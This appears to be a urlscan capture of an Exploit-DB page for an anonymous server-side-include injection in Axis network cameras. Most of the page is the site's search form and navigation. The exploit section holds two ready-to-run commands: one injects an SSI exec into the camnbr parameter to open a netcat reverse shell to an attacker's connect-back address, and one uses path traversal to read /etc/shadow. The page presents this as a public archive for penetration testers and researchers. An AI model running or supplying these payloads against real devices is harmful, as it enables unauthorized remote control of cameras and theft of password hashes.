www.exploit-db.com
Open in
urlscan Pro
192.124.249.13
Public Scan
URL:
https://www.exploit-db.com/exploits/43984
Submission: On September 27 via manual from JP — Scanned from JP
Submission: On September 27 via manual from JP — Scanned from JP
Form analysis
1 forms found in the DOMGET https://www.exploit-db.com/search
<form action="https://www.exploit-db.com/search" method="GET" id="searchForm">
<div class="row">
<div class="col-sm-12 col-lg-8">
<div class="form-group">
<label for="titleSearch" class="control-label text-primary">Title</label>
<input id="titleSearch" class="form-control" type="text" name="q" placeholder="Title" value="" autofocus="">
</div>
</div>
<div class="col-sm-6 col-lg-4">
<div class="form-group">
<label for="cveSearch" class="control-label text-primary">CVE</label>
<input id="cveSearch" class="form-control" type="text" name="cve" placeholder="2024-1234" value="" autofocus="">
</div>
</div>
</div>
<div class="row">
<div class="col-sm-6 col-lg-4">
<label for="typeSearchSelect" class="text-primary">Type</label>
<select id="typeSearchSelect" name="type" class="form-control">
<option></option>
<option value="dos"> dos </option>
<option value="local"> local </option>
<option value="remote"> remote </option>
<option value="shellcode"> shellcode </option>
<option value="papers"> papers </option>
<option value="webapps"> webapps </option>
</select>
</div>
<div class="col-sm-6 col-lg-4">
<label for="platformSearchSelect" class="text-primary">Platform</label>
<select id="platformSearchSelect" name="platform" class="form-control">
<option></option>
<option value="aix"> AIX </option>
<option value="asp"> ASP </option>
<option value="bsd"> BSD </option>
<option value="bsd_ppc"> BSD_PPC </option>
<option value="bsd_x86"> BSD_x86 </option>
<option value="bsdi_x86"> BSDi_x86 </option>
<option value="cgi"> CGI </option>
<option value="freebsd"> FreeBSD </option>
<option value="freebsd_x86"> FreeBSD_x86 </option>
<option value="freebsd_x86-64"> FreeBSD_x86-64 </option>
<option value="generator"> Generator </option>
<option value="hardware"> Hardware </option>
<option value="hp-ux"> HP-UX </option>
<option value="irix"> IRIX </option>
<option value="jsp"> JSP </option>
<option value="linux"> Linux </option>
<option value="linux_mips"> Linux_MIPS </option>
<option value="linux_ppc"> Linux_PPC </option>
<option value="linux_sparc"> Linux_SPARC </option>
<option value="linux_x86"> Linux_x86 </option>
<option value="linux_x86-64"> Linux_x86-64 </option>
<option value="minix"> MINIX </option>
<option value="multiple"> Multiple </option>
<option value="netbsd_x86"> NetBSD_x86 </option>
<option value="novell"> Novell </option>
<option value="openbsd"> OpenBSD </option>
<option value="openbsd_x86"> OpenBSD_x86 </option>
<option value="osx_ppc"> OSX_PPC </option>
<option value="osx"> OSX </option>
<option value="php"> PHP </option>
<option value="plan9"> Plan9 </option>
<option value="qnx"> QNX </option>
<option value="sco"> SCO </option>
<option value="sco_x86"> SCO_x86 </option>
<option value="solaris"> Solaris </option>
<option value="solaris_sparc"> Solaris_SPARC </option>
<option value="solaris_x86"> Solaris_x86 </option>
<option value="tru64"> Tru64 </option>
<option value="ultrix"> ULTRIX </option>
<option value="unix"> Unix </option>
<option value="unixware"> UnixWare </option>
<option value="windows_x86"> Windows_x86 </option>
<option value="windows_x86-64"> Windows_x86-64 </option>
<option value="windows"> Windows </option>
<option value="arm"> ARM </option>
<option value="cfm"> CFM </option>
<option value="netware"> Netware </option>
<option value="superh_sh4"> SuperH_SH4 </option>
<option value="java"> Java </option>
<option value="beos"> BeOS </option>
<option value="immunix"> Immunix </option>
<option value="palm_os"> Palm_OS </option>
<option value="atheos"> AtheOS </option>
<option value="ios"> iOS </option>
<option value="android"> Android </option>
<option value="xml"> XML </option>
<option value="perl"> Perl </option>
<option value="python"> Python </option>
<option value="system_z"> System_z </option>
<option value="json"> JSON </option>
<option value="ashx"> ASHX </option>
<option value="ruby"> Ruby </option>
<option value="aspx"> ASPX </option>
<option value="macos"> macOS </option>
<option value="linux_crisv32"> Linux_CRISv32 </option>
<option value="ezine"> eZine </option>
<option value="magazine"> Magazine </option>
<option value="nodejs"> NodeJS </option>
<option value="alpha"> Alpha </option>
<option value="solaris_mips"> Solaris_MIPS </option>
<option value="lua"> Lua </option>
<option value="watchos"> watchOS </option>
<option value="vxworks"> VxWorks </option>
<option value="python2"> Python2 </option>
<option value="python3"> Python3 </option>
<option value="typescript"> TypeScript </option>
<option value="go"> Go </option>
</select>
</div>
<div class="col-sm-6 col-lg-4">
<div class="form-group">
<label for="authorSearch" class="text-primary">Author</label>
<input id="authorSearch" class="form-control" type="text" name="e_author" placeholder="Author" value="">
</div>
</div>
</div>
<div class="row">
<div class="col-sm-12 col-lg-6">
<div class="form-group">
<label for="textSearch" class="control-label text-primary">Content</label>
<input id="textSearch" class="form-control" type="text" name="text" placeholder="Exploit content" value="">
</div>
</div>
<div class="col-sm-6 col-lg-2">
<label for="portSearchSelect" class="text-primary">Port</label>
<select id="portSearchSelect" name="port" class="form-control">
<option></option>
<option value="14"> 14 </option>
<option value="21"> 21 </option>
<option value="22"> 22 </option>
<option value="23"> 23 </option>
<option value="25"> 25 </option>
<option value="42"> 42 </option>
<option value="49"> 49 </option>
<option value="53"> 53 </option>
<option value="66"> 66 </option>
<option value="69"> 69 </option>
<option value="70"> 70 </option>
<option value="79"> 79 </option>
<option value="80"> 80 </option>
<option value="81"> 81 </option>
<option value="102"> 102 </option>
<option value="105"> 105 </option>
<option value="110"> 110 </option>
<option value="111"> 111 </option>
<option value="113"> 113 </option>
<option value="119"> 119 </option>
<option value="123"> 123 </option>
<option value="135"> 135 </option>
<option value="139"> 139 </option>
<option value="143"> 143 </option>
<option value="161"> 161 </option>
<option value="162"> 162 </option>
<option value="164"> 164 </option>
<option value="383"> 383 </option>
<option value="389"> 389 </option>
<option value="402"> 402 </option>
<option value="406"> 406 </option>
<option value="411"> 411 </option>
<option value="443"> 443 </option>
<option value="444"> 444 </option>
<option value="445"> 445 </option>
<option value="446"> 446 </option>
<option value="502"> 502 </option>
<option value="504"> 504 </option>
<option value="513"> 513 </option>
<option value="514"> 514 </option>
<option value="515"> 515 </option>
<option value="532"> 532 </option>
<option value="548"> 548 </option>
<option value="554"> 554 </option>
<option value="555"> 555 </option>
<option value="617"> 617 </option>
<option value="623"> 623 </option>
<option value="631"> 631 </option>
<option value="655"> 655 </option>
<option value="689"> 689 </option>
<option value="783"> 783 </option>
<option value="787"> 787 </option>
<option value="808"> 808 </option>
<option value="873"> 873 </option>
<option value="888"> 888 </option>
<option value="901"> 901 </option>
<option value="998"> 998 </option>
<option value="1000"> 1000 </option>
<option value="1040"> 1040 </option>
<option value="1089"> 1089 </option>
<option value="1099"> 1099 </option>
<option value="1100"> 1100 </option>
<option value="1114"> 1114 </option>
<option value="1120"> 1120 </option>
<option value="1194"> 1194 </option>
<option value="1235"> 1235 </option>
<option value="1471"> 1471 </option>
<option value="1521"> 1521 </option>
<option value="1533"> 1533 </option>
<option value="1581"> 1581 </option>
<option value="1589"> 1589 </option>
<option value="1604"> 1604 </option>
<option value="1617"> 1617 </option>
<option value="1723"> 1723 </option>
<option value="1743"> 1743 </option>
<option value="1761"> 1761 </option>
<option value="1812"> 1812 </option>
<option value="1858"> 1858 </option>
<option value="1861"> 1861 </option>
<option value="1900"> 1900 </option>
<option value="1947"> 1947 </option>
<option value="2000"> 2000 </option>
<option value="2022"> 2022 </option>
<option value="2049"> 2049 </option>
<option value="2100"> 2100 </option>
<option value="2103"> 2103 </option>
<option value="2121"> 2121 </option>
<option value="2125"> 2125 </option>
<option value="2181"> 2181 </option>
<option value="2242"> 2242 </option>
<option value="2315"> 2315 </option>
<option value="2375"> 2375 </option>
<option value="2380"> 2380 </option>
<option value="2381"> 2381 </option>
<option value="2401"> 2401 </option>
<option value="2480"> 2480 </option>
<option value="2525"> 2525 </option>
<option value="2640"> 2640 </option>
<option value="2810"> 2810 </option>
<option value="2812"> 2812 </option>
<option value="2947"> 2947 </option>
<option value="2954"> 2954 </option>
<option value="2990"> 2990 </option>
<option value="3000"> 3000 </option>
<option value="3030"> 3030 </option>
<option value="3050"> 3050 </option>
<option value="3052"> 3052 </option>
<option value="3128"> 3128 </option>
<option value="3129"> 3129 </option>
<option value="3181"> 3181 </option>
<option value="3200"> 3200 </option>
<option value="3217"> 3217 </option>
<option value="3306"> 3306 </option>
<option value="3333"> 3333 </option>
<option value="3378"> 3378 </option>
<option value="3389"> 3389 </option>
<option value="3460"> 3460 </option>
<option value="3465"> 3465 </option>
<option value="3500"> 3500 </option>
<option value="3535"> 3535 </option>
<option value="3632"> 3632 </option>
<option value="3690"> 3690 </option>
<option value="3790"> 3790 </option>
<option value="3814"> 3814 </option>
<option value="3817"> 3817 </option>
<option value="4000"> 4000 </option>
<option value="4002"> 4002 </option>
<option value="4070"> 4070 </option>
<option value="4081"> 4081 </option>
<option value="4105"> 4105 </option>
<option value="4111"> 4111 </option>
<option value="4322"> 4322 </option>
<option value="4343"> 4343 </option>
<option value="4434"> 4434 </option>
<option value="4444"> 4444 </option>
<option value="4501"> 4501 </option>
<option value="4555"> 4555 </option>
<option value="4592"> 4592 </option>
<option value="4661"> 4661 </option>
<option value="4750"> 4750 </option>
<option value="4848"> 4848 </option>
<option value="5000"> 5000 </option>
<option value="5060"> 5060 </option>
<option value="5061"> 5061 </option>
<option value="5080"> 5080 </option>
<option value="5081"> 5081 </option>
<option value="5093"> 5093 </option>
<option value="5151"> 5151 </option>
<option value="5180"> 5180 </option>
<option value="5247"> 5247 </option>
<option value="5250"> 5250 </option>
<option value="5272"> 5272 </option>
<option value="5308"> 5308 </option>
<option value="5432"> 5432 </option>
<option value="5466"> 5466 </option>
<option value="5554"> 5554 </option>
<option value="5555"> 5555 </option>
<option value="5600"> 5600 </option>
<option value="5655"> 5655 </option>
<option value="5666"> 5666 </option>
<option value="5800"> 5800 </option>
<option value="5803"> 5803 </option>
<option value="5814"> 5814 </option>
<option value="5858"> 5858 </option>
<option value="5900"> 5900 </option>
<option value="5984"> 5984 </option>
<option value="6066"> 6066 </option>
<option value="6070"> 6070 </option>
<option value="6080"> 6080 </option>
<option value="6082"> 6082 </option>
<option value="6101"> 6101 </option>
<option value="6112"> 6112 </option>
<option value="6129"> 6129 </option>
<option value="6379"> 6379 </option>
<option value="6502"> 6502 </option>
<option value="6503"> 6503 </option>
<option value="6660"> 6660 </option>
<option value="6667"> 6667 </option>
<option value="7001"> 7001 </option>
<option value="7002"> 7002 </option>
<option value="7070"> 7070 </option>
<option value="7071"> 7071 </option>
<option value="7080"> 7080 </option>
<option value="7100"> 7100 </option>
<option value="7144"> 7144 </option>
<option value="7210"> 7210 </option>
<option value="7272"> 7272 </option>
<option value="7290"> 7290 </option>
<option value="7426"> 7426 </option>
<option value="7443"> 7443 </option>
<option value="7510"> 7510 </option>
<option value="7547"> 7547 </option>
<option value="7649"> 7649 </option>
<option value="7770"> 7770 </option>
<option value="7777"> 7777 </option>
<option value="7778"> 7778 </option>
<option value="7787"> 7787 </option>
<option value="7879"> 7879 </option>
<option value="7902"> 7902 </option>
<option value="8000"> 8000 </option>
<option value="8001"> 8001 </option>
<option value="8002"> 8002 </option>
<option value="8004"> 8004 </option>
<option value="8008"> 8008 </option>
<option value="8020"> 8020 </option>
<option value="8022"> 8022 </option>
<option value="8023"> 8023 </option>
<option value="8028"> 8028 </option>
<option value="8030"> 8030 </option>
<option value="8080"> 8080 </option>
<option value="8081"> 8081 </option>
<option value="8082"> 8082 </option>
<option value="8088"> 8088 </option>
<option value="8090"> 8090 </option>
<option value="8181"> 8181 </option>
<option value="8300"> 8300 </option>
<option value="8400"> 8400 </option>
<option value="8443"> 8443 </option>
<option value="8445"> 8445 </option>
<option value="8473"> 8473 </option>
<option value="8500"> 8500 </option>
<option value="8585"> 8585 </option>
<option value="8619"> 8619 </option>
<option value="8800"> 8800 </option>
<option value="8812"> 8812 </option>
<option value="8839"> 8839 </option>
<option value="8880"> 8880 </option>
<option value="8888"> 8888 </option>
<option value="9000"> 9000 </option>
<option value="9001"> 9001 </option>
<option value="9002"> 9002 </option>
<option value="9080"> 9080 </option>
<option value="9090"> 9090 </option>
<option value="9091"> 9091 </option>
<option value="9100"> 9100 </option>
<option value="9124"> 9124 </option>
<option value="9200"> 9200 </option>
<option value="9251"> 9251 </option>
<option value="9256"> 9256 </option>
<option value="9443"> 9443 </option>
<option value="9447"> 9447 </option>
<option value="9784"> 9784 </option>
<option value="9788"> 9788 </option>
<option value="9855"> 9855 </option>
<option value="9876"> 9876 </option>
<option value="9900"> 9900 </option>
<option value="9987"> 9987 </option>
<option value="9993"> 9993 </option>
<option value="9999"> 9999 </option>
<option value="10000"> 10000 </option>
<option value="10001"> 10001 </option>
<option value="10080"> 10080 </option>
<option value="10202"> 10202 </option>
<option value="10203"> 10203 </option>
<option value="10443"> 10443 </option>
<option value="10616"> 10616 </option>
<option value="11000"> 11000 </option>
<option value="11211"> 11211 </option>
<option value="11460"> 11460 </option>
<option value="12203"> 12203 </option>
<option value="12221"> 12221 </option>
<option value="12345"> 12345 </option>
<option value="12397"> 12397 </option>
<option value="12401"> 12401 </option>
<option value="13327"> 13327 </option>
<option value="13701"> 13701 </option>
<option value="13722"> 13722 </option>
<option value="13838"> 13838 </option>
<option value="16992"> 16992 </option>
<option value="18821"> 18821 </option>
<option value="18881"> 18881 </option>
<option value="19000"> 19000 </option>
<option value="19810"> 19810 </option>
<option value="19813"> 19813 </option>
<option value="20000"> 20000 </option>
<option value="20002"> 20002 </option>
<option value="20010"> 20010 </option>
<option value="20031"> 20031 </option>
<option value="20111"> 20111 </option>
<option value="20171"> 20171 </option>
<option value="22003"> 22003 </option>
<option value="23423"> 23423 </option>
<option value="25672"> 25672 </option>
<option value="26000"> 26000 </option>
<option value="27015"> 27015 </option>
<option value="27700"> 27700 </option>
<option value="28015"> 28015 </option>
<option value="30000"> 30000 </option>
<option value="30303"> 30303 </option>
<option value="31337"> 31337 </option>
<option value="32400"> 32400 </option>
<option value="32674"> 32674 </option>
<option value="32764"> 32764 </option>
<option value="34205"> 34205 </option>
<option value="37215"> 37215 </option>
<option value="37777"> 37777 </option>
<option value="37848"> 37848 </option>
<option value="38292"> 38292 </option>
<option value="40007"> 40007 </option>
<option value="41523"> 41523 </option>
<option value="44334"> 44334 </option>
<option value="46824"> 46824 </option>
<option value="48080"> 48080 </option>
<option value="49152"> 49152 </option>
<option value="50000"> 50000 </option>
<option value="50496"> 50496 </option>
<option value="52311"> 52311 </option>
<option value="52789"> 52789 </option>
<option value="52869"> 52869 </option>
<option value="52986"> 52986 </option>
<option value="53413"> 53413 </option>
<option value="54345"> 54345 </option>
<option value="54890"> 54890 </option>
<option value="55554"> 55554 </option>
<option value="55555"> 55555 </option>
<option value="56380"> 56380 </option>
<option value="57772"> 57772 </option>
<option value="58080"> 58080 </option>
<option value="62514"> 62514 </option>
</select>
</div>
<div class="col-sm-6 col-lg-4">
<label for="tagSearchSelect" class="text-primary">Tag</label>
<select id="tagSearchSelect" name="tag" class="form-control">
<option></option>
<option value="1"> WordPress Core </option>
<option value="3"> Metasploit Framework (MSF) </option>
<option value="4"> WordPress Plugin </option>
<option value="7"> SQL Injection (SQLi) </option>
<option value="8"> Cross-Site Scripting (XSS) </option>
<option value="9"> File Inclusion (LFI/RFI) </option>
<option value="12"> Cross-Site Request Forgery (CSRF) </option>
<option value="13"> Denial of Service (DoS) </option>
<option value="14"> Code Injection </option>
<option value="15"> Command Injection </option>
<option value="16"> Authentication Bypass / Credentials Bypass (AB/CB) </option>
<option value="18"> Client Side </option>
<option value="19"> Use After Free (UAF) </option>
<option value="20"> Out Of Bounds </option>
<option value="21"> Remote </option>
<option value="22"> Local </option>
<option value="23"> XML External Entity (XXE) </option>
<option value="24"> Integer Overflow </option>
<option value="25"> Server-Side Request Forgery (SSRF) </option>
<option value="26"> Race Condition </option>
<option value="27"> NULL Pointer Dereference </option>
<option value="28"> Malware </option>
<option value="31"> Buffer Overflow </option>
<option value="34"> Heap Overflow </option>
<option value="35"> Type Confusion </option>
<option value="36"> Object Injection </option>
<option value="37"> Bug Report </option>
<option value="38"> Console </option>
<option value="39"> Pwn2Own </option>
<option value="40"> Traversal </option>
<option value="41"> Deserialization </option>
</select>
</div>
</div>
<div class="row">
<div class="col-12">
<div class="form-check form-check-inline">
<label class="form-check-label text-primary">
<input class="form-check-input" type="checkbox" name="verified" value="true" id="verifiedSearchCheck"> Verified <span class="form-check-sign">
<span class="check"></span>
</span>
</label>
</div>
<div class="form-check form-check-inline">
<label class="form-check-label text-primary">
<input class="form-check-input" type="checkbox" name="hasapp" value="true" id="hasappSearchCheck"> Has App <span class="form-check-sign">
<span class="check"></span>
</span>
</label>
</div>
<div class="form-check form-check-inline">
<label class="form-check-label text-primary">
<input class="form-check-input" type="checkbox" name="nomsf" value="true" id="nomsfCheck"> No Metasploit <span class="form-check-sign">
<span class="check"></span>
</span>
</label>
</div>
</div>
</div>
<div class="row">
<div class="col-12">
<button type="submit" class="btn btn-primary float-right">Search</button>
</div>
</div>
</form>
Text Content
Exploit Database * Exploits * GHDB * Papers * Shellcodes -------------------------------------------------------------------------------- * Search EDB * SearchSploit Manual * Submissions -------------------------------------------------------------------------------- * Online Training * Stats * About Us About Exploit-DB Exploit-DB History FAQ * Search AXIS SSI - REMOTE COMMAND EXECUTION / READ FILES EDB-ID: 43984 CVE: N/A -------------------------------------------------------------------------------- EDB Verified: AUTHOR: BASHIS TYPE: REMOTE -------------------------------------------------------------------------------- Exploit: / PLATFORM: MULTIPLE DATE: 2017-10-20 -------------------------------------------------------------------------------- Vulnerable App: [STX] Subject: SSI Remote Execute and Read Files Researcher: bashis <mcw noemail eu> (August 2016) Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis) Attack Vector: Remote Authentication: Anonymous (no credentials needed) Conditions: The cam must be configure to allow anonymous view Execute remote commands (PoC: Connect back shell): echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT> Notes: <CONNECT BACK IP> = LHOST IP <CONNECT BACK PORT> = LHOST PORT <TARGET IP> = RHOST IP <TARGET PORT> RHOST PORT Read remote files (PoC: Read /etc/shadow - check top of the returned output): echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT> Notes: <TARGET IP> = RHOST IP <TARGET PORT> RHOST PORT [ETX] Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services Databases Exploits Google Hacking Papers Shellcodes Links Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics Sites OffSec Kali Linux VulnHub Solutions Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services * * Exploit Database by OffSec * Terms * Privacy * About Us * FAQ * Cookies © OffSec Services Limited 2024. All rights reserved. ABOUT THE EXPLOIT DATABASE × The Exploit Database is maintained by OffSec, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. The Exploit Database is a non-profit project that is provided as a public service by OffSec. The Exploit Database is a CVE compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Our aim is to serve the most comprehensive collection of exploits gathered through direct submissions, mailing lists, as well as other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. The Google Hacking Database (GHDB) is a categorized index of Internet search engine queries designed to uncover interesting, and usually sensitive, information made publicly available on the Internet. In most cases, this information was never meant to be made public but due to any number of factors this information was linked in a web document that was crawled by a search engine that subsequently followed that link and indexed the sensitive information. The process known as “Google Hacking” was popularized in 2000 by Johnny Long, a professional hacker, who began cataloging these queries in a database known as the Google Hacking Database. His initial efforts were amplified by countless hours of community member effort, documented in the book Google Hacking For Penetration Testers and popularised by a barrage of media attention and Johnny’s talks on the subject such as this early talk recorded at DEFCON 13. Johnny coined the term “Googledork” to refer to “a foolish or inept person as revealed by Google“. This was meant to draw attention to the fact that this was not a “Google problem” but rather the result of an often unintentional misconfiguration on the part of a user or a program installed by the user. Over time, the term “dork” became shorthand for a search query that located sensitive information and “dorks” were included with may web application vulnerability releases to show examples of vulnerable web sites. After nearly a decade of hard work by the community, Johnny turned the GHDB over to OffSec in November 2010, and it is now maintained as an extension of the Exploit Database. Today, the GHDB includes searches for other online search engines such as Bing, and other online repositories like GitHub, producing different, yet equally valuable results. Close OFFSEC RESOURCES × Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Proving Grounds Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services Close SEARCH THE EXPLOIT DATABASE × Title CVE Type dos local remote shellcode papers webapps Platform AIX ASP BSD BSD_PPC BSD_x86 BSDi_x86 CGI FreeBSD FreeBSD_x86 FreeBSD_x86-64 Generator Hardware HP-UX IRIX JSP Linux Linux_MIPS Linux_PPC Linux_SPARC Linux_x86 Linux_x86-64 MINIX Multiple NetBSD_x86 Novell OpenBSD OpenBSD_x86 OSX_PPC OSX PHP Plan9 QNX SCO SCO_x86 Solaris Solaris_SPARC Solaris_x86 Tru64 ULTRIX Unix UnixWare Windows_x86 Windows_x86-64 Windows ARM CFM Netware SuperH_SH4 Java BeOS Immunix Palm_OS AtheOS iOS Android XML Perl Python System_z JSON ASHX Ruby ASPX macOS Linux_CRISv32 eZine Magazine NodeJS Alpha Solaris_MIPS Lua watchOS VxWorks Python2 Python3 TypeScript Go Author Content Port 14 21 22 23 25 42 49 53 66 69 70 79 80 81 102 105 110 111 113 119 123 135 139 143 161 162 164 383 389 402 406 411 443 444 445 446 502 504 513 514 515 532 548 554 555 617 623 631 655 689 783 787 808 873 888 901 998 1000 1040 1089 1099 1100 1114 1120 1194 1235 1471 1521 1533 1581 1589 1604 1617 1723 1743 1761 1812 1858 1861 1900 1947 2000 2022 2049 2100 2103 2121 2125 2181 2242 2315 2375 2380 2381 2401 2480 2525 2640 2810 2812 2947 2954 2990 3000 3030 3050 3052 3128 3129 3181 3200 3217 3306 3333 3378 3389 3460 3465 3500 3535 3632 3690 3790 3814 3817 4000 4002 4070 4081 4105 4111 4322 4343 4434 4444 4501 4555 4592 4661 4750 4848 5000 5060 5061 5080 5081 5093 5151 5180 5247 5250 5272 5308 5432 5466 5554 5555 5600 5655 5666 5800 5803 5814 5858 5900 5984 6066 6070 6080 6082 6101 6112 6129 6379 6502 6503 6660 6667 7001 7002 7070 7071 7080 7100 7144 7210 7272 7290 7426 7443 7510 7547 7649 7770 7777 7778 7787 7879 7902 8000 8001 8002 8004 8008 8020 8022 8023 8028 8030 8080 8081 8082 8088 8090 8181 8300 8400 8443 8445 8473 8500 8585 8619 8800 8812 8839 8880 8888 9000 9001 9002 9080 9090 9091 9100 9124 9200 9251 9256 9443 9447 9784 9788 9855 9876 9900 9987 9993 9999 10000 10001 10080 10202 10203 10443 10616 11000 11211 11460 12203 12221 12345 12397 12401 13327 13701 13722 13838 16992 18821 18881 19000 19810 19813 20000 20002 20010 20031 20111 20171 22003 23423 25672 26000 27015 27700 28015 30000 30303 31337 32400 32674 32764 34205 37215 37777 37848 38292 40007 41523 44334 46824 48080 49152 50000 50496 52311 52789 52869 52986 53413 54345 54890 55554 55555 56380 57772 58080 62514 Tag WordPress Core Metasploit Framework (MSF) WordPress Plugin SQL Injection (SQLi) Cross-Site Scripting (XSS) File Inclusion (LFI/RFI) Cross-Site Request Forgery (CSRF) Denial of Service (DoS) Code Injection Command Injection Authentication Bypass / Credentials Bypass (AB/CB) Client Side Use After Free (UAF) Out Of Bounds Remote Local XML External Entity (XXE) Integer Overflow Server-Side Request Forgery (SSRF) Race Condition NULL Pointer Dereference Malware Buffer Overflow Heap Overflow Type Confusion Object Injection Bug Report Console Pwn2Own Traversal Deserialization Verified Has App No Metasploit Search